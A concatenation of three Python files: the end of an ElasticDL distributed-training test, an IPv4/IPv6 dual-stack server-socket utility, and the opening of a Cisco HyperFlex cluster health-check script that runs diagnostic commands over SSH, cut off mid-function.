model_def = "mnist_functional_api.mnist_functional_api.custom_model"
num_data = 8
training_data = [
get_random_batch(self._batch_size) for _ in range(num_data)
]
workers = []
self._create_pserver(model_def, 2)
for w in range(2):
self._reset_pserver()
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
workers.append(worker)
worker._run_model_call_before_training(training_data[0][0])
for i in range(num_data):
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(
training_data[i][0], training_data[i][1]
)
worker.report_gradient(w_grads)
if w == 1 and i == 3:
# Restart ps for the 2nd worker at i==3
# self._restart_pserver(model_def)
self._reset_pserver()
# `report_variable` will be called in `get_model` to
# initialize variables on ps with worker variables
worker.get_model()
# send the grads again as these grads are not applied
# on worker variables
worker.report_gradient(w_grads)
for var_name in workers[0]._non_embed_vars:
np.testing.assert_array_equal(
workers[0]._non_embed_vars[var_name].numpy(),
workers[1]._non_embed_vars[var_name].numpy(),
)
def test_train_acceleration_with_embedding(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0,
train_db=db,
test_db=test_db,
stop_step=100,
use_tf_function=True,
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
if __name__ == "__main__":
unittest.main()
|
server_from_net.py
|
#!/usr/bin/env python
"""
Utility functions to create server sockets able to listen on both
IPv4 and IPv6.
"""
__author__ = "Giampaolo Rodola' <g.rodola [AT] gmail [DOT] com>"
__license__ = "MIT"
import os
import sys
import socket
import select
import contextlib
def has_dual_stack(sock=None):
"""Return True if kernel allows creating a socket which is able to
listen for both IPv4 and IPv6 connections.
If *sock* is provided the check is made against it.
"""
try:
socket.AF_INET6; socket.IPPROTO_IPV6; socket.IPV6_V6ONLY
except AttributeError:
return False
try:
if sock is not None:
return not sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
with contextlib.closing(sock):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
return True
except socket.error:
return False
def create_server_sock(address, family=None, reuse_addr=None, queue_size=5,
dual_stack=has_dual_stack()):
"""Convenience function which creates a TCP server bound to
*address* and return the socket object.
Internally it takes care of choosing the right address family
(IPv4 or IPv6) depending on the host specified in *address*
(a (host, port) tuple.
If host is an empty string or None all interfaces are assumed
and if dual stack is supported by kernel the socket will be
able to listen for both IPv4 and IPv6 connections.
*family* can be set to either AF_INET or AF_INET6 to force the
socket to use IPv4 or IPv6. If not set it will be determined
from host.
*reuse_addr* tells the kernel to reuse a local socket in TIME_WAIT
state, without waiting for its natural timeout to expire.
If not set will default to True on POSIX.
*queue_size* is the maximum number of queued connections passed to
listen() (defaults to 5).
If *dual_stack* if True it will force the socket to listen on both
IPv4 and IPv6 connections (defaults to True on all platforms
natively supporting this functionality).
The returned socket can be used to accept() new connections as in:
>>> server = create_server_sock((None, 8000))
>>> while True:
... sock, addr = server.accept()
... # handle new sock connection
"""
AF_INET6 = getattr(socket, 'AF_INET6', 0)
host, port = address
if host == "":
# http://mail.python.org/pipermail/python-ideas/2013-March/019937.html
host = None
if host is None and dual_stack:
host = "::"
if family is None:
family = socket.AF_UNSPEC
if reuse_addr is None:
reuse_addr = os.name == 'posix' and sys.platform != 'cygwin'
err = None
info = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM,
0, socket.AI_PASSIVE)
if not dual_stack:
# in case dual stack is not supported we want IPv4 to be
# preferred over IPv6
info.sort(key=lambda x: x[0] == socket.AF_INET, reverse=True)
for res in info:
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if reuse_addr:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == AF_INET6:
if dual_stack:
# enable
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
elif has_dual_stack(sock):
# disable
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
sock.bind(sa)
sock.listen(queue_size)
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error("getaddrinfo returns an empty list")
class MultipleSocketsListener:
"""Listen on multiple addresses specified as a list of
(host, port) tuples.
Useful to listen on both IPv4 and IPv6 on those systems where
a dual stack is not supported natively (Windows and many UNIXes).
The returned instance is a socket-like object which can be used to
accept() new connections, as with a common socket.
Calls like settimeout() and setsockopt() will be applied to all
sockets.
Callks like gettimeout() or getsockopt() will refer to the first
socket in the list.
"""
def __init__(self, addresses, family=None, reuse_addr=None, queue_size=5):
self._socks = []
self._sockmap = {}
if hasattr(select, 'poll'):
self._pollster = select.poll()
else:
self._pollster = None
completed = False
try:
for addr in addresses:
sock = create_server_sock(addr, family=family,
reuse_addr=reuse_addr, queue_size=queue_size,
dual_stack=False)
self._socks.append(sock)
fd = sock.fileno()
if self._pollster is not None:
self._pollster.register(fd, select.POLLIN)
self._sockmap[fd] = sock
completed = True
finally:
if not completed:
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __repr__(self):
addrs = []
for sock in self._socks:
try:
addrs.append(sock.getsockname())
except socket.error:
addrs.append(())
return '<%s (%r) at %#x>' % (self.__class__.__name__, addrs, id(self))
def _poll(self):
"""Return the first readable fd."""
timeout = self.gettimeout()
if self._pollster is None:
fds = select.select(self._sockmap.keys(), [], [], timeout)
if timeout and fds == ([], [], []):
raise socket.timeout('timed out')
else:
if timeout != None:
timeout *= 1000
fds = self._pollster.poll(timeout)
if timeout and fds == []:
raise socket.timeout('timed out')
try:
return fds[0][0]
except IndexError:
pass # non-blocking socket
def _multicall(self, name, *args, **kwargs):
for sock in self._socks:
meth = getattr(sock, name)
meth(*args, **kwargs)
def accept(self):
"""Accept a connection from the first socket which is ready
to do so.
"""
fd = self._poll()
sock = self._sockmap[fd] if fd else self._socks[0]
return sock.accept()
def filenos(self):
"""Return sockets's file descriptors as a list of integers.
This is useful with select().
"""
return list(self._sockmap.keys())
def getsockname(self):
"""Return first registered socket's own address."""
return self._socks[0].getsockname()
def getsockopt(self, level, optname, buflen=0):
"""Return first registered socket's options."""
return self._socks[0].getsockopt(level, optname, buflen)
def gettimeout(self):
"""Return first registered socket's timeout."""
return self._socks[0].gettimeout()
def settimeout(self, timeout):
"""Set timeout for all registered sockets."""
self._multicall('settimeout', timeout)
def setblocking(self, flag):
"""Set non/blocking mode for all registered sockets."""
self._multicall('setblocking', flag)
def setsockopt(self, level, optname, value):
"""Set option for all registered sockets."""
self._multicall('setsockopt', level, optname, value)
def shutdown(self, how):
"""Shut down all registered sockets."""
self._multicall('shutdown', how)
def close(self):
"""Close all registered sockets."""
self._multicall('close')
self._socks = []
self._sockmap.clear()
# ===================================================================
# --- tests
# ===================================================================
# if __name__ == '__main__':
# import unittest
# import threading
# import errno
# import time
# try:
# from test.support import find_unused_port # PY3
# except ImportError:
# from test.test_support import find_unused_port # PY2
#
#
# class TestCase(unittest.TestCase):
#
# def echo_server(self, sock):
# def run():
# with contextlib.closing(sock):
# conn, _ = sock.accept()
# with contextlib.closing(conn) as conn:
# msg = conn.recv(1024)
# if not msg:
# return
# conn.sendall(msg)
#
# t = threading.Thread(target=run)
# t.start()
# time.sleep(.1)
#
# def test_create_server_sock(self):
# port = find_unused_port()
# sock = create_server_sock((None, port))
# with contextlib.closing(sock):
# self.assertEqual(sock.getsockname()[1], port)
# self.assertEqual(sock.type, socket.SOCK_STREAM)
# if has_dual_stack():
# self.assertEqual(sock.family, socket.AF_INET6)
# else:
# self.assertEqual(sock.family, socket.AF_INET)
# self.echo_server(sock)
# cl = socket.create_connection(('localhost', port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# def test_has_dual_stack(self):
# # IPv4 sockets are not supposed to support dual stack
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# with contextlib.closing(sock):
# sock.bind(("", 0))
# self.assertFalse(has_dual_stack(sock=sock))
#
# def test_dual_stack(self):
# sock = create_server_sock((None, 0))
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# sock = create_server_sock((None, 0))
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# if has_dual_stack():
# self.assertTrue(has_dual_stack(sock=sock))
# cl = socket.create_connection(("::1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
# else:
# self.assertFalse(has_dual_stack(sock=sock))
# try:
# socket.create_connection(("::1", port))
# except socket.error as err:
# if os.name == 'nt':
# code = errno.WSAECONNREFUSED
# else:
# code = errno.ECONNREFUSED
# self.assertEqual(err.errno, code)
# else:
# self.fail('exception not raised')
#
# # just stop server
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(sock):
# cl.sendall(b'foo')
# cl.recv(1024)
# if hasattr(unittest, 'skip'): # PY >= 2.7
# unittest.skip('dual stack cannot be tested as not '
# 'supported')
#
# # --- multiple listener tests
#
# def test_mlistener(self):
# port = find_unused_port()
# # v4
# sock = MultipleSocketsListener([('127.0.0.1', port), ('::1', port)])
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
# # v6
# sock = MultipleSocketsListener([('127.0.0.1', port), ('::1', port)])
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("::1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# def test_mlistener_timeout(self):
# sock = MultipleSocketsListener([('127.0.0.1', 0), ('::1', 0)])
# sock.settimeout(.01)
# self.assertRaises(socket.timeout, sock.accept)
#
# def test_mlistener_nonblocking(self):
# sock = MultipleSocketsListener([('127.0.0.1', 0), ('::1', 0)])
# sock.setblocking(False)
# try:
# sock.accept()
# except socket.error as err:
# if os.name == 'nt':
# code = errno.WSAEWOULDBLOCK
# else:
# code = errno.EAGAIN
# self.assertEqual(err.errno, code)
# else:
# self.fail('exception not raised')
#
# def test_mlistener_ctx_manager(self):
# with MultipleSocketsListener([("0.0.0.0", 0), ("::", 0)]) as msl:
# pass
# self.assertEqual(msl._socks, [])
# self.assertEqual(msl._sockmap, {})
#
# def test_mlistener_overridden_meths(self):
# with MultipleSocketsListener([("0.0.0.0", 0), ("::", 0)]) as msl:
# self.assertEqual(
# bool(msl.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)),
# os.name == 'posix')
# self.assertEqual(msl.getsockname()[0], "0.0.0.0")
# self.assertTrue(msl.filenos())
# msl.setblocking(True)
# msl.settimeout(2)
# self.assertEqual(msl.gettimeout(), 2)
# try:
# msl.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# except socket.error:
# pass
#
# test_suite = unittest.TestSuite()
# test_suite.addTest(unittest.makeSuite(TestCase))
# unittest.TextTestRunner(verbosity=2).run(test_suite)
a = MultipleSocketsListener('127.0.0.1', queue_size=5)
|
HXTool.py
|
# -*- coding: utf-8 -*-
"""
Created on 9-Mar-2018
Updated on 29-Apr-2020
@author: Kiranraj(kjogleka), Himanshu(hsardana), Komal(kpanzade), Avinash(avshukla)
"""
import warnings
warnings.filterwarnings('ignore')
import subprocess
import paramiko
import threading
import time
import datetime
import logging
import sys
import os
import shutil
import getpass
import re
import json
import tarfile
from prettytable import PrettyTable, ALL
from collections import OrderedDict
from progressbar import ProgressBarThread
from multiprocessing import Process
# Global Variables
toolversion = 4.2
builddate = "2021-04-29"
sedNote = False
lsusbCheck = False
######################## Logger #################################
INFO = logging.INFO
DEBUG = logging.DEBUG
ERROR = logging.ERROR
def get_date_time():
return (datetime.datetime.now().strftime("%Y-%m-%d_%I-%M-%S"))
def log_start(log_file, log_name, lvl):
# Create a folder
cdate = datetime.datetime.now()
global dir_name
dir_name = "HX_Report_" + str(cdate.strftime("%Y_%m_%d_%H_%M_%S"))
try:
os.makedirs(dir_name)
except FileExistsError:
shutil.rmtree(dir_name)
os.makedirs(dir_name)
os.chdir(dir_name)
# Configure logger file handler
global logger
log_level = lvl
logger = logging.getLogger(log_name)
logger.setLevel(log_level)
# Create a file handler
handler = logging.FileHandler(log_file)
handler.setLevel(log_level)
# Create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%Y-%m-%d %I:%M:%S')
handler.setFormatter(formatter)
# Add the handlers to the logger
logger.addHandler(handler)
msg = "HX Checkup Tool Started at Date/Time :" + get_date_time().replace("_", "/") + "\r"
global start_time
start_time = datetime.datetime.now()
logger.info(msg)
#log_msg("", msg)
logger.info("Logger Initialized\r")
def log_stop():
# Exit the logger and stop the script, used for traceback error handling
log_msg(INFO, "Closing logger and exiting the application\r")
msg = "HX Checkup Tool Stopped at Date/Time :" + get_date_time().replace("_", "/") + "\r"
log_msg(INFO, msg)
end_time = datetime.datetime.now()
time_diff = end_time - start_time
msg = "Test duration: " + str(time_diff.seconds) + " seconds"
log_msg(INFO, msg)
logging.shutdown()
def log_entry(cmd_name):
# Each function will call this in the beginning to enter any DEBUG info
logger.log(DEBUG, 'Entered command :' + cmd_name + "\r")
def log_exit(cmd_name):
# Each function will call this in the end, to enter any DEBUG info
logger.log(DEBUG, 'Exited command :' + cmd_name + "\r")
def log_msg(lvl, *msgs):
# Each function will call this to enter any INFO msg
msg = ""
if len(msgs)>1:
for i in msgs:
msg = msg + str(i) + "\r\n"
msg.rstrip("\r\n")
else:
for i in msgs:
msg = msg + str(i)
# Print on Console & log
for line in msg.split("\r\n"):
if lvl == "" and line != "":
print(line)
elif line != "":
logger.log(lvl, line)
def sys_exit(val):
# Shutdown the logger handler
try:
log_stop()
except Exception:
pass
sys.exit(val)
#################### SSH connection #####################
def runcmd(cmd, display=True):
# Execute local shell command
log_entry(cmd)
log_msg(INFO, "$" * 61 + "\r")
log_msg(INFO, "\r\nExecuting Shell command: " + cmd + "\r")
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
cmdoutput, err = p.communicate()
p_status = p.wait()
output = cmdoutput.split("\n")
log_msg(INFO, "*" * 24 + " CMD OUTPUT " + "*" * 24 + "\r")
if display:
for line in output:
log_msg(INFO, str(line) + "\r")
log_msg(INFO, "*" * 61 + "\r")
return cmdoutput
def execmd(cmd):
# Execute command
log_entry(cmd)
log_msg(INFO, "#" * 61 + "\r")
log_msg(INFO, "\r\nExecuting command: " + cmd + "\r")
stdin, stdout, stderr = client.exec_command(cmd)
while not stdout.channel.exit_status_ready():
time.sleep(1)
response = stdout.channel.exit_status
output = []
if response == 0:
for line in stdout:
output.append(line.strip())
else:
for line in stderr:
output.append(line.strip())
output.insert(0,"Not able to run the command")
log_msg(INFO, "*"*24 + " CMD OUTPUT " + "*"*24 + "\r")
for line in output:
log_msg(INFO, line +"\r")
log_msg(INFO, "*" * 61 + "\r")
log_exit(cmd)
return output
def check_psd(ips, hxusername, hxpassword, esxpassword, time_out):
log_msg(INFO, "\r\nChecking the HX root password\r")
ip = ips[0]
esxip = ""
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# Get ESX IP
cmd = "/opt/springpath/storfs-mgmt-cli/getLocalNode.sh | grep 'esxiIP=' | cut -d= -f2"
op = execmd(cmd)
if "Not able to run the command" not in op:
esxip = str(op[0]).strip()
log_msg(INFO, "\r\nValid HX root password\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
log_msg(INFO, "\r\nInvalid HX root password\r")
log_msg("", "\r\nInvalid HX root password\r")
sys.exit(0)
if esxip != "":
log_msg(INFO, "\r\nChecking the ESX root password\r")
try:
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg(INFO, "\r\nValid ESX root password\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
log_msg(INFO, "\r\nInvalid ESX root password\r")
log_msg("", "\r\nInvalid ESX root password\r")
sys.exit(0)
def thread_geteth0ip(ip, hxusername, hxpassword, time_out):
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
#cmd = "hostname -i"
cmd = "ifconfig eth0 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
hxip = execmd(cmd)
eth0_list.extend(hxip)
client.close()
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
def thread_sshconnect(ip, hxusername, hxpassword, time_out):
hostd[str(ip)] = dict.fromkeys(["hostname", "date", "ntp source", "package & versions", "check package & versions", "eth1", "esxip" "vmk0", "vmk1", "iptables count", "check iptables", "keystore"], "")
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
# Check hostname
try:
cmd = "hostname"
hname = execmd(cmd)
hostd[ip]["hostname"] = ("".join(hname)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Check NTP source
try:
cmd = "stcli services ntp show"
hntp = execmd(cmd)
hntp = [i for i in hntp if "----" not in i]
hostd[ip]["ntp source"] = (",".join(hntp)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# check package and versions
try:
#cmd = "dpkg -l | grep -i springpath | cut -d' ' -f3,4-"
cmd = "dpkg -l | grep -i springpath | grep -v storfs-support* | cut -d' ' -f3,4-"
op = execmd(cmd)
pkgl = []
for s in op:
pkgl.append(s[:65])
hostd[ip]["package & versions"] = pkgl
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get eth1 IP Address
try:
cmd = "ifconfig eth0 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
eth1ip = execmd(cmd)
hostd[ip]["eth0"] = ("".join(eth1ip)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get vmk0 and vmk1 IP Address
try:
#cmd = "/usr/share/springpath/storfs-misc/run-on-esxi.sh 'esxcfg-vmknic -l'"
# Get ESX IP
cmd = "/opt/springpath/storfs-mgmt-cli/getLocalNode.sh | grep 'esxiIP=' | cut -d= -f2"
op = execmd(cmd)
if op:
esxip = op[0]
hostd[ip]["esxip"] = str(esxip)
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# check Iptables count
try:
cmd = "iptables -L -n | wc -l"
ipt = execmd(cmd)
hostd[ip]["iptables count"] = ("".join(ipt)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get keystore file
try:
cmd = "md5sum /etc/springpath/secure/springpath_keystore.jceks"
op = execmd(cmd)
if op:
keystoreFile = op[0]
hostd[ip]["keystore"] = keystoreFile.strip()
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def thread_timestamp(ip, hxusername, hxpassword, time_out):
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
# Check date
try:
cmd = 'date "+%D %T"'
hdate = execmd(cmd)
hostd[ip]["date"] = ("".join(hdate)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def get_vmk1(ip, hxusername, esxpassword, time_out):
esxip = hostd[ip].get("esxip", "")
if esxip != "":
vmknode = ""
try:
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
# Check vMotion Enabled
try:
cmd = "vim-cmd hostsvc/vmotion/netconfig_get | grep -i selectedVnic"
op = execmd(cmd)
vmst = "FAIL"
for line in op:
if "unset" in line:
vmst = "FAIL"
elif "VMotionConfig" in line:
vmst = "PASS"
v = re.search(r"vmk\d", line)
if v:
vmknode = v.group()
esx_vmotion[esxip]["vmotion"] = vmst
esx_vmotion[esxip]["vmknode"] = vmknode
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get vmk0 and vmk1 IP Address
try:
cmd = "esxcfg-vmknic -l"
op = execmd(cmd)
for line in op:
if "vmk1" in line and "IPv4" in line:
m = re.search(r"([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
vmk1 = str(m.group(1))
hostd[ip]["vmk1"] = vmk1
vmk1_list.append(vmk1)
vmk1_mtu[vmk1] = {}
if " 1500 " in line:
vmk1_mtu[vmk1]["mtu"] = "1472"
elif " 9000 " in line:
vmk1_mtu[vmk1]["mtu"] = "8972"
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def pingstatus(op):
pgst = "PASS"
for line in op:
if "Not able to run the command" in line or "Network is unreachable" in line:
pgst = "FAIL"
elif "0 packets received" in line or "100% packet loss" in line or " 0 received" in line:
pgst = "FAIL"
elif ", 0% packet loss" in line:
pgst = "PASS"
return pgst
def cluster_services_check(ip):
# 1) stcli cluster info
cldict = {}
# Get Healthstate
cmd = "stcli cluster info | grep -i healthState: | cut -d: -f2"
op = execmd(cmd)
cldict["HealthState"] = "".join(op)
# Get State
cmd = "stcli cluster info | grep -i ^State: | cut -d: -f2"
op = execmd(cmd)
cldict["State"] = "".join(op)
log_msg(INFO, str(cldict) + "\r")
# 2) sysmtool --ns cluster --cmd healthdetail
cmd = "sysmtool --ns cluster --cmd healthdetail"
cl_health = execmd(cmd)
cl_health_reason = []
flag2 = flag3 = flag4 = 0
global nodes
nodes = ""
for line in cl_health:
if line.startswith("Cluster Health Detail:"):
flag2 = 1
continue
if flag2 == 1 and line.startswith("State:"):
s = str(line.split(": ")[-1]).lower()
if cldict["State"] == s :
pass
else:
cldict["State"] = s
continue
if flag2 == 1 and "HealthState:" in line:
h = str(line.split(": ")[-1]).lower()
if cldict["HealthState"] == h:
continue
else:
cldict["HealthState"] = h
flag3 = 1
if flag3 == 1 and "Health State Reason:" in line:
flag4 = 1
continue
if flag4 == 1:
if not line.startswith("#"):
break
else:
cl_health_reason.append(line)
if flag2 == 1 and "Current ensemble size:" in line:
nodes = line.strip().split(": ")[1]
break
log_msg(INFO, str(cldict) + "\r")
hostd[ip].update(cldict)
# 3) service_status.sh
cmd = "service_status.sh"
cl_service = execmd(cmd)
# pidof storfs
cmd = "pidof storfs"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("storfs {:>44}".format("... Running"))
else:
cl_service.append("storfs {:>44}".format("... Not Running"))
# pidof stMgr
cmd = "pidof stMgr"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("stMgr {:>45}".format("... Running"))
else:
cl_service.append("stMgr {:>45}".format("... Not Running"))
# pidof stNodeMgr
cmd = "pidof stNodeMgr"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("stNodeMgr {:>41}".format("... Running"))
else:
cl_service.append("stNodeMgr {:>41}".format("... Not Running"))
# 4) sysmtool --ns cluster --cmd enospcinfo
cmd = "sysmtool --ns cluster --cmd enospcinfo"
cl_space = execmd(cmd)
free_capacity = ""
ENOSPC_warning = ""
space_state = ""
enospc_state = ""
enospc_state_check = "FAIL"
for line in cl_space:
if "Free capacity:" in line:
free_capacity = line.strip().split(": ")[1]
if "ENOSPC warning:" in line:
ENOSPC_warning = line.strip().split(": ")[1]
if free_capacity[-1] == ENOSPC_warning[-1]:
if float(free_capacity[:-1])>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "T":
if (float(free_capacity[:-1])*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "G":
if (float(free_capacity[:-1])*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "M":
if (float(free_capacity[:-1])*1024*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
for line in cl_space:
if "Enospc state:" in line:
l = line.split(": ")
if len(l) == 2:
enospc_state = l[1]
if "ENOSPACE_CLEAR" in enospc_state.strip():
enospc_state_check = "PASS"
break
# 5) stcli cleaner info
cmd = "stcli cleaner info"
clop = execmd(cmd)
cl_cleaner_state = ""
# Get eth1 ip address
cmd = "ifconfig eth1 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
op = execmd(cmd)
eth1ip = ""
if op:
eth1ip = op[0]
for line in clop:
if eth1ip in line or ip in line:
if "online" in line.lower():
cl_cleaner_state = "online"
elif "offline" in line.lower():
cl_cleaner_state = "offline"
break
# 6) Data Replication Factor
cmd = "stcli cluster info | grep 'dataReplicationFactor:' | tail -1 | cut -d: -f2"
op = execmd(cmd)
rf = ""
if op:
rf = op[0].strip()
# Update Test Detail info
testdetail[ip]["Cluster services check"] = OrderedDict()
# State
testdetail[ip]["Cluster services check"]["State"] = cldict["State"]
# HealthState
testdetail[ip]["Cluster services check"]["HealthState"] = cldict["HealthState"]
# Services
testdetail[ip]["Cluster services check"]["Services"] = cl_service
# Space state
testdetail[ip]["Cluster services check"]["Space State"] = space_state
# Enospc state
testdetail[ip]["Cluster services check"]["Enospc State"] = enospc_state
# Cleaner state
testdetail[ip]["Cluster services check"]["Cleaner Info"] = cl_cleaner_state
# Data Replication Factor
testdetail[ip]["Cluster services check"]["Replication Factor"] = rf
# Update Test summary
cluster_service_chk = "FAIL"
if cldict["State"] == "online":
cluster_service_chk = "PASS"
if cldict["HealthState"] == "healthy":
cluster_service_chk = "PASS"
for line in cl_service:
if "Springpath File System" in line and "Not" in line:
cluster_service_chk = "FAIL"
break
elif line.startswith("SCVM Client") and "Not" in line:
cluster_service_chk = "FAIL"
break
elif "System Management Service" in line and "Not" in line:
cluster_service_chk = "FAIL"
break
elif line.startswith("Cluster IP Monitor") and "Not" in line:
cluster_service_chk = "FAIL"
break
testsum[ip]["Cluster services check"] = {"Status": cluster_service_chk, "Result": "Checks storfs, stMgr, sstNodeMgr service running on each node."}
testsum[ip]["Enospc state check"] = {"Status": enospc_state_check, "Result": "Checks if the cluster storage utilization is above threshold."}
def zookeeper_check(ip):
# ZooKeeper and Exhibitor check
# 1) Mode
# echo srvr | nc localhost 2181
cmd = "echo srvr | nc localhost 2181"
zkl = execmd(cmd)
mode = ""
for line in zkl:
if "Mode:" in line:
mode = line.split(": ")[1]
# 2) Services
# pidof exhibitor
cmd = "pidof exhibitor"
exhl = execmd(cmd)
exh_service = ""
exh_comm = []
zcond1 = 0
for line in exhl:
s = line.strip()
if s.isdigit():
exh_service = "exhibitor {:>32}".format("... Running")
else:
exh_service = "exhibitor {:>32}".format("... Not Running")
zcond1 = 1
if zcond1 == 1:
cmd = "ls /etc/springpath/*"
op = execmd(cmd)
exh_comm.append("Files in the path[/etc/springpath/*]")
for line in op:
exh_comm.append(line.strip())
cmd = "ls /opt/springpath/config/*"
op = execmd(cmd)
exh_comm.append("\nFiles in the path[/opt/springpath/config/*]")
for line in op:
exh_comm.append(line.strip())
# 3) Check exhibitor.properties file exists
cmd = "ls /etc/exhibitor/exhibitor.properties"
op = execmd(cmd)
prop_file = ""
for line in op:
if "Not able to run the command" in line:
prop_file = "Not Exists"
break
elif "exhibitor.properties" in line and not("cannot access" in line):
prop_file = "Exists"
else:
prop_file = "Not Exists"
# Epoch Issue
# 4) Accepted Epoch value
# 5) Current Epoch value
cmd = "grep -m1 '' /var/zookeeper/version-2/acceptedEpoch"
op = execmd(cmd)
acflag = 0
for line in op:
if "Not able to run the command" in line or "No such file or directory" in line:
acflag = 1
if acflag:
accepoch = ""
else:
accepoch = "".join(op)
cmd = "grep -m1 '' /var/zookeeper/version-2/currentEpoch"
op = execmd(cmd)
cuflag = 0
